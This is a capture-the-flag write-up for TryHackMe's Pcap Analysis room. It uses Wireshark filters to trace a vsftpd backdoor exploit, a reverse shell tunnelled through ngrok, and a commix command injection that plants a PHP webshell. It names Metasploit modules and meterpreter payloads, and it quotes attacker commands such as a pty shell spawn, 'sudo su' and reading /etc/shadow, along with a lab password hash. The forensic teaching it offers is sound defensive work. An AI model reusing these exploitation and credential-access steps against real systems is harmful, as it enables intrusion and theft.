TryHackMe: Pcap Analysis

Write-up of the Pcap Analysis room created by Anıl Yelken on TryHackMe

Hello everyone! In this article, I will describe the solution of the Pcap Analysis room provided by Kale İleri Teknoloji. We will answer the questions by analyzing the pcap files provided separately for each task.

[Task 1]

Firstly, we open the file named pcap.pcapng with Wireshark. Then we use the following filter script to find the banner information on port 21.

tcp.port == 21

We see that the FTP service is running on port 21 and its banner information is vsFPDd 2.3.4.

Then, to find the NSE Script requested from us, we perform a grep command to search in the folder containing Nmap scripts on Kali Linux with the following script.

find /usr/share/nmap/scripts -iname ‘*.nse’ | xargs grep ‘USER X:)’ -sl

We find that the desired NSE Script from us is ftp-vsftpd-backdoor.nse

For the third question, we need to analyze the code of the script we found. For this, we are reviewing the code of the script available on GitHub.

https://github.com/nmap/nmap/blob/master/scripts/ftp-vsftpd-backdoor.nse

When we examine it, we see that it runs the id command.

When we come to the next question, after running the Metasploit framework, we search for banner information with the following command.

search vsftpd

The exploit used is exploit/unix/ftp/vsftpd_234_backdoor.

Data transmission occurs in packets where the PSH and ACK flags are set. By examining the contents of the packets here, it can be determined which commands are run. Therefore, to find the first command used, we can find the commands that are executed after opening the backdoor with the following filter.

tcp.flags.ack==1 and tcp.flags.push==1

In packet 209, the whoami command was first executed after the backdoor connection.

If we right-click on packet 209 and press the “Follow”-> “TCP Stream” button, we can see the commands that are executed in the TCP stream.

As for the following questions, the ID of the kaleileriteknoloji user is 1003 and the content of the user.txt file contains 10031003.

[Task 2]

When we come to the second task, we open the pcap2.pcapng file with Wireshark.

First, we can look at the DNS A record query and use the following filter for this.

dns.a

Here tunnel.us.ngrok.com the IP address of the domain name has been determined as 3.134.73.173. The data will be transmitted via reverse shell via packets with PSH and ACK flags set. Here we need to focus on the areas where the source and destination IP addresses are loopback. The following filter can be used to detect it.

tcp.flags.ack==1 and tcp.flags.push==1 and ip.src==127.0.0.1 and. ip.dst==127.0.0.1

We can see that port 4444 was used to receive a reverse shell with Ngrok.

If we right-click on packet 526 we found and press the “Follow”-> “TCP Stream” button, we can see the commands that are executed in the TCP stream.

We can see that the second command executed is whoami.

[Task 3]

Finally, when we come to the third task, we download our file pcap3.pcapng and open it with Wireshark.

To analyze, let’s extract the POST methods in HTTP requests and observe which commands are executed and the results. The following filter can be used to detect it.

http.request.method == POST

We’re going through all the packets. Let’s examine the final packet in detail.

When we examine the 1196th packet, we can see that the exploit was obtained from port 1234 of the IP address 10.10.10.128. In addition, it is seen that the exploited vulnerability is Command Injection. Also, if the User-Agent part is examined to find the tool used, it is seen that it is a commix.

For the fourth question, after using the same filter, we notice the script in packet 871 when reviewing packets one by one.

Command eval is used to run the base64 encoded data in the web request.

For the next question, we need to search for payloads with the search command in the Metasploit Framework. The following search query can be used to find it.

search php payload meterpreter

Here, php/meterpreter/reverse_tcp is the payload that directly catches our eye.

In order to see the sent commands, we need to look again at the places where the ACK and PUSH packets are set to 1. The following filter can be used to filter it.

tcp.flags.ack==1 and tcp.flags.push==1

When we view the TCP stream from packet 887, we can access the malware’s codes.

As can be seen, shell_exec function is to run the command with the cmd parameter it receives.

Then, to answer the remaining questions, we must set the PUSH and ACK packets to 1 again and additionally filter our port to 1234. The following filter can be used to filter it.

As it turned out, there was a large flow of traffic. To view this stream, right-click on packet 1206 and press the “Follow”-> “TCP Stream” button.

As can be seen, the first command executed was the id, and the python -c “import pty;pty.spawn(‘/bin/bash’)” command was used for the interactive shell.

And then when we get to the end of this stream.

We can see that the credential’s full path is /home/siber/cred.txt. Moreover, the siber user’s name is mentioned in the file where the credential is located. Also, the password of the user of siber is 12345. To privilege escalation, the sudo su command is used.

When we get to the very end of the TCP stream, we find the hash of the siber user’s password in the response of the cat /etc/shadow command.

As you can see, the hash of the siber user’s password is $6$EELzOgDE$YhAb47Tf5EC7lI/GIT2hMUR6zrEk3RaTjfz2ZH3a2qCRHBmpo4n.0BuOZuAZvChyrFVS2YgyBZozTbeT1V1Fz.

Thanks to Anıl Yelken and Kale İleri Teknoloji for this room. I am waiting for your comments and feedback. Thanks for reading. Happy Hacks!